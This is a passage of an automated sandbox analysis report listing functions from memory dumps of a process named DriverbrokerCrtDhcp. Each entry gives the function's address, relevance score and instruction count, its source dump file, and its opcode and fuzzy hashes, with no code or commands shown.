Instruction Fuzzy Hash: 0D816E33B0D5494FE7A8DA1898AA5B937D0FF47310B0813BAD29EC7593DE1CA8169781

Function 00007FFD34890A19 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76ad795f0f68ac6f4eb5f56b61e28a30621400a4ee2aa60e891f4e54fe0d607
Instruction ID: 8ca1b9f357f755b1bbbfb010047a6fc6cb176a611bd9f0071bd916b9b8d98749
Opcode Fuzzy Hash: d76ad795f0f68ac6f4eb5f56b61e28a30621400a4ee2aa60e891f4e54fe0d607
Instruction Fuzzy Hash: B0712711B1DE4A0AF7A9663C08A52B97AC2EF87715F25127DE5CFC32C3DD1C6807A281

Function 00007FFD34C5D598 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e94952201d764cd576c49f6be199dc398639ba45ef9b020242dd698e3c1fbe3c
Instruction ID: 4aff008abfd3e7596edcca1aacc4d8d3b7816416a3c029be3698fe18a69d242a
Opcode Fuzzy Hash: e94952201d764cd576c49f6be199dc398639ba45ef9b020242dd698e3c1fbe3c
Instruction Fuzzy Hash: A211E052F0E7838AF679666618B11BC5AC09F532A4F1881FBE64EC64DA9C4C2844B382

Function 00007FFD34FF7BB6 Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 671c443bc97ccc726b50950c6d026a52b9c75dd5082107daecbd94824713af23
Instruction ID: d1d3d7816270acb124ae10796fa7f86414aeda00881a2193e9e3d493a72352cd
Opcode Fuzzy Hash: 671c443bc97ccc726b50950c6d026a52b9c75dd5082107daecbd94824713af23
Instruction Fuzzy Hash: 80813932B0CA464FE3789A2894E55B9B7E1EF47310B58067FD58FC3292DE2DB8029751

Function 00007FFD34C585B6 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12f58363ff8b33d71ab80aac7654e790c7f43203591cab47c6da7c0b18ac646d
Instruction ID: cdb6f8bf4d9a865f16fc42cf52fc2b923ab6db1341e4e40d4ee6a3907dc82d72
Opcode Fuzzy Hash: 12f58363ff8b33d71ab80aac7654e790c7f43203591cab47c6da7c0b18ac646d
Instruction Fuzzy Hash: D1812731B0D64A4FE3285A2A54A547E7BE0FF47350B1405BFE58EC3183DE2CB4129761

Function 00007FFD34C5626F Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bef14e64f4386a4a2ec7cf7f99cda8057b2b3bb10a0e4d66b0ba353284940cbb
Instruction ID: 6e39844e1dff2fa1f8c89953d9c32419ad6185e98cf0cc7fb26c84c1b41e3977
Opcode Fuzzy Hash: bef14e64f4386a4a2ec7cf7f99cda8057b2b3bb10a0e4d66b0ba353284940cbb
Instruction Fuzzy Hash: 85818222F0D6966BE761A7BCA8B10ED7FB09F13324B1C01B7D18CDA193ED2C64469385

Function 00007FFD34C572BB Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f56261bbc3873bb9ff59b21858c7b568b3b7c7b06fb501e3b81a6801249b74c6
Instruction ID: fb31eda51e6a42ecda98fdffa29343fc6283a378d6b69b32e74e41c13b1be130
Opcode Fuzzy Hash: f56261bbc3873bb9ff59b21858c7b568b3b7c7b06fb501e3b81a6801249b74c6
Instruction Fuzzy Hash: DF71D130E1D54E8FEBA4DBA588A46BDBBB1FF5A310F5004BAD50ED7181DE3C68819B40

Function 00007FFD34C5DDDB Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f29592cef430266911c295f01f3a2cd357a7086ceae8acecaa21be459e880e
Instruction ID: 74566569f9e48e5b8617ae76ad2d97755b405646896fbd7b0b4893d1997a8f50
Opcode Fuzzy Hash: 91f29592cef430266911c295f01f3a2cd357a7086ceae8acecaa21be459e880e
Instruction Fuzzy Hash: 3671AD30A1C74A8FEBA5DBA588B56FDBBA1EF56300F1041FAD10ED7192DE2C6841E741

Function 00007FFD34FF9E11 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432d8f7b72e69b4f4d2dc156dc7425dbe1aa6207345ec3a9bf54987a8a95626d
Instruction ID: 321bf3134b67fbc1c8c0e7a748029371bb65906d93ceff552d083c861dd083be
Opcode Fuzzy Hash: 432d8f7b72e69b4f4d2dc156dc7425dbe1aa6207345ec3a9bf54987a8a95626d
Instruction Fuzzy Hash: 01818C31A0CB068FE369DB14D1E097177E1FF46300B585A7DC98AC7A96CB6DB882DB41

Function 00007FFD348907BD Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5355152c20e0bed87e58c35451e6bbf1d9e850bcf76c23a2fc0bf1636ececee0
Instruction ID: 20b4f5289b871ce3a5e86c22db6911c29e7f9b9c6c68742fd1a10dc111c58262
Opcode Fuzzy Hash: 5355152c20e0bed87e58c35451e6bbf1d9e850bcf76c23a2fc0bf1636ececee0
Instruction Fuzzy Hash: 41613A32B0DA944FD761EB7C88A52EA7FE0EF47315B08007EE189D7193DE28A8469751

Function 00007FFD34C5CDF3 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce816bd593e8c6e4ff5c16f8c68dbfe0794c122fe03876a069ed7174ae57331e
Instruction ID: 641e3e66897bedecbabf6c9232d54cdcab6d28d07c8a56072010c8293cbb7e8c
Opcode Fuzzy Hash: ce816bd593e8c6e4ff5c16f8c68dbfe0794c122fe03876a069ed7174ae57331e
Instruction Fuzzy Hash: 4D517222E0D6955FDB61EBBCA8B10EE3BB4EF02324B0801B7D149DB193ED7C78499645

Function 00007FFD34FF9160 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0330e41eee34e4e3a42c865a0b3ff63fabc97cb548d28238e0b53a34f8af2211
Instruction ID: 0ea9463c062697c6ca187a8dcaecbef34cc656541dc765d44b6cd2525357e2c7
Opcode Fuzzy Hash: 0330e41eee34e4e3a42c865a0b3ff63fabc97cb548d28238e0b53a34f8af2211
Instruction Fuzzy Hash: 6651F521A1C55A4FEBA8DB5888B4BB477A1FF56300F1842FAC04ED7186CE3C6980DF41

Function 00007FFD34FF136F Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3aafdb8cb414b57db5a1f54ead0b569bff194b7e82bf84a4deb495374cc2ea3
Instruction ID: cdb21bb2a88d9be3d3ece4bce1e08a56971eb8b86d873d0dd557b090b7f92bba
Opcode Fuzzy Hash: d3aafdb8cb414b57db5a1f54ead0b569bff194b7e82bf84a4deb495374cc2ea3
Instruction Fuzzy Hash: B351B3315196458FEB89DF18C0E06B03BA5FF46310B9456BDC95ACB68BD77DE882CB40

Function 00007FFD34FFC1F2 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f147225bcc1436790353a8fa80d0160427317b10bded03cd6c9e13fef3d72ac
Instruction ID: c4ddf8f84581aaf4841008bb7b41dde60c713ed92376e08758c4bea0cd5c206b
Opcode Fuzzy Hash: 2f147225bcc1436790353a8fa80d0160427317b10bded03cd6c9e13fef3d72ac
Instruction Fuzzy Hash: A541F222A0D6965FE32167FC69751E67BB4DF02324B0C02B3D188DB093EC7978899395

Function 00007FFD34FF007B Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17345fc5439f250c2b10fb05933806ee4be5c31dd567ca64121e8d8a6988e57b
Instruction ID: 4c67c1abcbec78a97512cb4161a77764baea2a85b98d784bfa72665ec07ef5bb
Opcode Fuzzy Hash: 17345fc5439f250c2b10fb05933806ee4be5c31dd567ca64121e8d8a6988e57b
Instruction Fuzzy Hash: A6410932B0D7059FE76C5E1858E147977E4EF47364B28163EED8FC3282D92CB8426252

Function 00007FFD34FF68BB Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12bd99cf3f8be43326df61266e6dd33e916113db232e2b38f85f2b46529cdbf8
Instruction ID: 5ab8ed3256d97c4621a59251f6443f47563c2304c2ebfc285d8141fca052df9d
Opcode Fuzzy Hash: 12bd99cf3f8be43326df61266e6dd33e916113db232e2b38f85f2b46529cdbf8
Instruction Fuzzy Hash: 7341BE32A1855A8FFBA5DBA4C4A05BC7BB0FF16310F5806BAD10ED61A2DE3D6842D700

Function 00007FFD34C5C5B8 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c58349fb8af9446843e9a17efb5a5b27f67d2cedef99fc4cdc43d1453e97ad
Instruction ID: 681a08b9fa07d2884ef590c69904e80fce138dbb7221e84dbafadc184b9ebb46
Opcode Fuzzy Hash: 25c58349fb8af9446843e9a17efb5a5b27f67d2cedef99fc4cdc43d1453e97ad
Instruction Fuzzy Hash: DC412820A1C55A8FEB64D71984B06BC77A1FF92310F1886BBC54EE7186CE3CB985DB41

Function 00007FFD34FF27C7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b97a932c1fd767873f24552104100844783de22d7cdd0f9e13966c5ef05bf4e
Instruction ID: 4cac29f2f12192a4de4b22434c607f13b7b7331fb21957ebf6bcb1a4704e09f6
Opcode Fuzzy Hash: 7b97a932c1fd767873f24552104100844783de22d7cdd0f9e13966c5ef05bf4e
Instruction Fuzzy Hash: 3741533260C9198FDF98EF58C4A5DB5B3E1FFA931070801AAE14AD3256CE35E845CF81

Function 00007FFD34FFA437 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e4dc793194b0c608fdfe8824fd8503ce5618dcc8ec434e329f4332d38cbb23
Instruction ID: bc527c38e13b3a78441a5e14f7764eb18c2b5d4d742baffc6b5da59007e2755d
Opcode Fuzzy Hash: 51e4dc793194b0c608fdfe8824fd8503ce5618dcc8ec434e329f4332d38cbb23
Instruction Fuzzy Hash: 1741423260C9088FDF98EF68D4A6DB5B7E1FBA931070802AAD04ED3552DE35F845CB81

Function 00007FFD34C5AE27 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69de822663f65ecff6d0a5c545a9ee71d648a08cfe8216053015830f0c2dcc5a
Instruction ID: 46dd9a0329f32852bac37b2bde410d35fb72de16b596022e1cbd955c47920aa3
Opcode Fuzzy Hash: 69de822663f65ecff6d0a5c545a9ee71d648a08cfe8216053015830f0c2dcc5a
Instruction Fuzzy Hash: 0641633170C9548FDF88FF59D4A59A9B7E1FBA532470441AAD04EC3292DE35F845CB81

Function 00007FFD34C51AF7 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecf9f9cf51003e13d012de3ad97c22fedee41f5cf141bd31fe9bdb75028b4336
Instruction ID: b229289b6e0043b3b5eee78ac493749cf573529eba174995e9eec8f928764da5
Opcode Fuzzy Hash: ecf9f9cf51003e13d012de3ad97c22fedee41f5cf141bd31fe9bdb75028b4336
Instruction Fuzzy Hash: 3A41663260C9098FDF98EF58D4A5DB873E1FBA9314B0541AAD04ED3196DE39F885CB81

Function 00007FFD348912E8 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7fc1aed600965df1355aff5f2ddd20cde8bf44d021bd34abd97dd52e6c61977
Instruction ID: 941398ec50ca7de608d2629e3c8a92ee7defbc0cc74a7f208ae8d67c3cfa7ada
Opcode Fuzzy Hash: d7fc1aed600965df1355aff5f2ddd20cde8bf44d021bd34abd97dd52e6c61977
Instruction Fuzzy Hash: 9B31C420B1CD5A0FF794F76C94AE6B97BC5EB9A315B4440BAE50DC32D3DE2CAC428244

Function 00007FFD348907F2 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 235a2266f3641d6f2bc7905998a1258adf8e27b7bd858e619fcac18c5a77da6d
Instruction ID: a91bfd8a624d6b71afc8c15a60bad279eee5122a0b5fc6cab133b8d4c6ec0a32
Opcode Fuzzy Hash: 235a2266f3641d6f2bc7905998a1258adf8e27b7bd858e619fcac18c5a77da6d
Instruction Fuzzy Hash: 6F412832A0D7D51FD722AB7C58B60EA3FE4EF43328B0801BBD1C8C6193EE2854469791

Function 00007FFD348907D3 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522324f222fe12a9b2ba37c0631ac841b0c17fed624c0831f2b55bd1d2918a58
Instruction ID: 6fc2eeab466bf4a1b91e6f73c730c430da46db54456844d0c04ac1f0fdac948e
Opcode Fuzzy Hash: 522324f222fe12a9b2ba37c0631ac841b0c17fed624c0831f2b55bd1d2918a58
Instruction Fuzzy Hash: 7C312832A0D7D41FD722AB7C98A61EA3FE0EF47324B0801BBD5C9D6183DE3864469791

Function 00007FFD34FF2871 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5030cc1035b6b7e7b3a37a82f90a785f12288795427ace30f443fbf7702c5c07
Instruction ID: d671721d382946ebb7d98178c70c45dcd3b24ee201d46830c1b5662c269f170e
Opcode Fuzzy Hash: 5030cc1035b6b7e7b3a37a82f90a785f12288795427ace30f443fbf7702c5c07
Instruction Fuzzy Hash: 2B31423160C9588FDF98EF18C4A5E74B7E1FFA931470806AAE04AD7296CE35E845CF81

Function 00007FFD34FFA4E1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fb259a9f8849372060a50eb0e8ddb6af543c1a74d05805056fbc1fb15b16b15
Instruction ID: 377dcbdb86ed1fed93d40e0d83941b05696c81c667067fd50377389e0b3d8401
Opcode Fuzzy Hash: 7fb259a9f8849372060a50eb0e8ddb6af543c1a74d05805056fbc1fb15b16b15
Instruction Fuzzy Hash: F631303260C9548FDB9CEB28C4A6E74B7E1FBA931071802AAD05AD7192CE35F845CB81

Function 00007FFD34C5AED1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73bd0620898890a0654b1cbf89d0e0ebc56f6c6695a96974e37f0819b186c29a
Instruction ID: 498bb6f5de99a8e74e16757e33997e66152e87da08dfc45c449b78fec18604dd
Opcode Fuzzy Hash: 73bd0620898890a0654b1cbf89d0e0ebc56f6c6695a96974e37f0819b186c29a
Instruction Fuzzy Hash: F63190317089548FDB98FF28C4A5E69B7E1FBA931570842AAD04EC7292CE35F845CB81

Function 00007FFD34C51BA1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b4f50a4a1fef8d1c1c2bb355c0fb93eaaef15194e907100aeb56228ff6095d0
Instruction ID: dcd9a2496792abf82d96d47e89fea620da0cbdd359c15561c8087792f2b30b38
Opcode Fuzzy Hash: 0b4f50a4a1fef8d1c1c2bb355c0fb93eaaef15194e907100aeb56228ff6095d0
Instruction Fuzzy Hash: B031723160C9488FDF9DEF18C4A5EB473E1FBA931470541AAD04AC7196DE39F881CB81

Function 00007FFD348907C0 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2713414957.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34890000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e6cb2195462dda9a9d090238245eb3ca0ff487cd37209c255237f8d92827d1
Instruction ID: 5e9817c17b006d946f0ed8192b12d37c62bddf8aaaab74f0f9247568965166f0
Opcode Fuzzy Hash: 48e6cb2195462dda9a9d090238245eb3ca0ff487cd37209c255237f8d92827d1
Instruction Fuzzy Hash: 82312832A0D7D51FD722AB7C58660EA3FE0EF07324B08017BD189D6193EE2854469791

Function 00007FFD34FF280B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f1c1417be3015f94a264529b4184a324f8b55caae826e593b33abc285b4386
Instruction ID: d659cd25ae41b3442f58ca45686cbc5594da307b0d8d20630bad982b97024334
Opcode Fuzzy Hash: c4f1c1417be3015f94a264529b4184a324f8b55caae826e593b33abc285b4386
Instruction Fuzzy Hash: AB31323160C9598FDF98EF18C4A5DB4B3E1FFA931070905AAE04AD7256CE35E845CF81

Function 00007FFD34FFA47B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f59f5f18bdf8bb90ac28ff0e8ec29e671ee15d9a5cb4988d94509d00a89cfc
Instruction ID: 8119258234e2d19523d8650bac5daf68678b1226c3587d92ab7603579aff9d74
Opcode Fuzzy Hash: 23f59f5f18bdf8bb90ac28ff0e8ec29e671ee15d9a5cb4988d94509d00a89cfc
Instruction Fuzzy Hash: A831213260C9458FDB98EF28C0A5EB5B7E1FB6931071402AAD04AD7592DE35F845CB81

Function 00007FFD34C51B3B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9ea2a735bdd7316d9ff9f342fda3e2ba1e633203dbead17e561003c0a74388b
Instruction ID: db7fbe536af2354f224d5ed12a62ab98846c4df1872516c35beb4b90ef95f615
Opcode Fuzzy Hash: e9ea2a735bdd7316d9ff9f342fda3e2ba1e633203dbead17e561003c0a74388b
Instruction Fuzzy Hash: C231623160C9098FDF98EF28C4A5EB873E1FBA931470541AAD04AD7196DE39F881CB81

Function 00007FFD34C5AE6B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 432400f63b124fe6682215abb10b4a31b8c760643c92b47ef159de65e527fe4f
Instruction ID: 5c50408aea05a4992d3f73ed2dddcc89118fe3335544fe571044e3b6b116fd1d
Opcode Fuzzy Hash: 432400f63b124fe6682215abb10b4a31b8c760643c92b47ef159de65e527fe4f
Instruction Fuzzy Hash: A63181317089558FDB98FF28C4A5EA9B7E1FBA931470442AAD04EC7292CE35F845CB81

Function 00007FFD34C5EABB Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7004c699b588167c8c6fd5a904bf1e5b1f1d7f3490b99cb3c46a1362aed8ae7
Instruction ID: a1c64f304eaaacb32d49a3cea6965a8a876af9f33bbbdebf116498be4d3e000e
Opcode Fuzzy Hash: e7004c699b588167c8c6fd5a904bf1e5b1f1d7f3490b99cb3c46a1362aed8ae7
Instruction Fuzzy Hash: AE313E71B1891A8FDB44DB19C4E19BCB7A1FF5A310B1441BAD10ED3286CF28BC52D794

Function 00007FFD34FF759D Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2765221237.00007FFD34FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34ff0000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2054f5d31187e886b4facff8db6148eaec048e5d26149ab945b2a8d2fbda4ab6
Instruction ID: f8e843c69d6a9f62075bd67bfe5ed7b0296dc7e2311f570fb9b4ba68f0d30cd8
Opcode Fuzzy Hash: 2054f5d31187e886b4facff8db6148eaec048e5d26149ab945b2a8d2fbda4ab6
Instruction Fuzzy Hash: FC318172B0890A8FDB48EB5CD4A19A8F7E1FF55310B584279D10ED7682DF28B812DB90

Function 00007FFD34C5AC35 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8b3b2b58c113fab53b0eb82a2bf344722080b8dffcae6aba93f896e3dc3bdb6
